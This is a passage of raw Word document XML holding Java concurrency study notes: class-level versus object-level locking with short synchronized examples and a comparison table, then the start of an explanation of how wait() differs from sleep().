          <v:rect id="_x0000_i1821" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163F48A" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Class Level Lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A92408"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It locks the Class object itself (i.e., MyClass.class).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD80ED7"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used with</w:t>
      </w:r>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static synchronized methods or synchronized blocks on MyClass.class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE0FF9" w14:textId="43197967" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00A82D33"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Behaviour</w:t>
      </w:r>
      <w:r w:rsidR="00912F46" w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only one thread can access synchronized static methods of the class, regardless of how many instances exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7769F9" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222936DF"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public static synchronized void staticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222AD272"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 xml:space="preserve">    // class-level lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD81330"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6505FB"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Or:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A35D73"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public void method() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5344FAF0"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 xml:space="preserve">    synchronized(MyClass.class) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BB430"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 xml:space="preserve">        // class-level lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C579A"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07597156"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5DA12C" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00000000" w:rsidP="00912F4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6F27A30">
          <v:rect id="_x0000_i1822" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFCDFE9" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🆚</w:t>
      </w:r>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comparis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9"/>
        <w:gridCol w:w="2882"/>
        <w:gridCol w:w="2630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="62C2C387" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F26E010" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912F46">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="616E874C" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912F46">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Object Level Lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6849655E" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912F46">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Class Level Lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="55C35D5B" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D3FFF6"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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="340F6C1D"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Specific object instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB37604"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Class (i.e., all instances)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="3C864C56" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42E14719"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Used With</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57715828"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synchronized instance methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="324FDAB6"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synchronized static methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="54F7B20B" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072B5F61"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Lock Obtained On</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F6C170"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this</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0667BE2F"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MyClass.class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="59A0B4BE" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D7626D7"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Affects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78BCCD95"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Only the locked object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E27D844" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912F46">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>All instances of the class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D42B208" w14:textId="7ACCA436" w:rsidR="00912F46" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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7545EFA">
          <v:rect id="_x0000_i1823" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954696E" w14:textId="77777777" w:rsidR="00E928B6" w:rsidRPr="00CE4B95" w:rsidRDefault="00E928B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="266" w:name="_Toc196307746"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between wait and sleep?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="266"/>
    </w:p>
    <w:p w14:paraId="306EEAF7" w14:textId="56E1F3DB" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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The wait() and sleep() methods are both used in multi-threaded programming in Java, but they serve different purposes and have different behaviors. Here's a breakdown of their differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A38C6EB" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. wait() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F340042" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>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Defined in:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FACA7A" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used for </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inter-thread communication</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It makes the current thread wait until another thread sends a signal (usually by calling notify() or notifyAll() on the same object).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783696BD" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wait() can only be called from a synchronized block or method. When wait() is invoked, the thread gives up the lock it holds and enters the "waiting" state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141CA7E" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>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Release Lock:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yes, when a thread calls wait(), it releases the lock and enters the waiting state. It will resume execution only when another thread calls notify() or notifyAll() on the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34022B1A" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>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State:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The thread enters the "waiting" state and will remain there until it's notified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C4A6D" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>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Can be Interrupted:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yes, a thread waiting on wait() can be interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E002A76" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>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Example Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1769DC2B" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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synchronized (object) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5330154B" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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while (conditionNotMet) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ADB682" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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object.wait();  // Makes the thread wait until notified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F9862" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC5A484" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C454FA4" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. sleep() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D3D56" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>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Defined in:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F708A0" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Causes the current thread to </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pause execution</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a specified amount of time (in milliseconds or nanoseconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5812A9AE" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sleep() does not require the thread to hold any lock, and it is used for making a thread sleep for a certain duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0463F5" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>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lastRenderedPageBreak/>
        <w:t>Release Lock:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
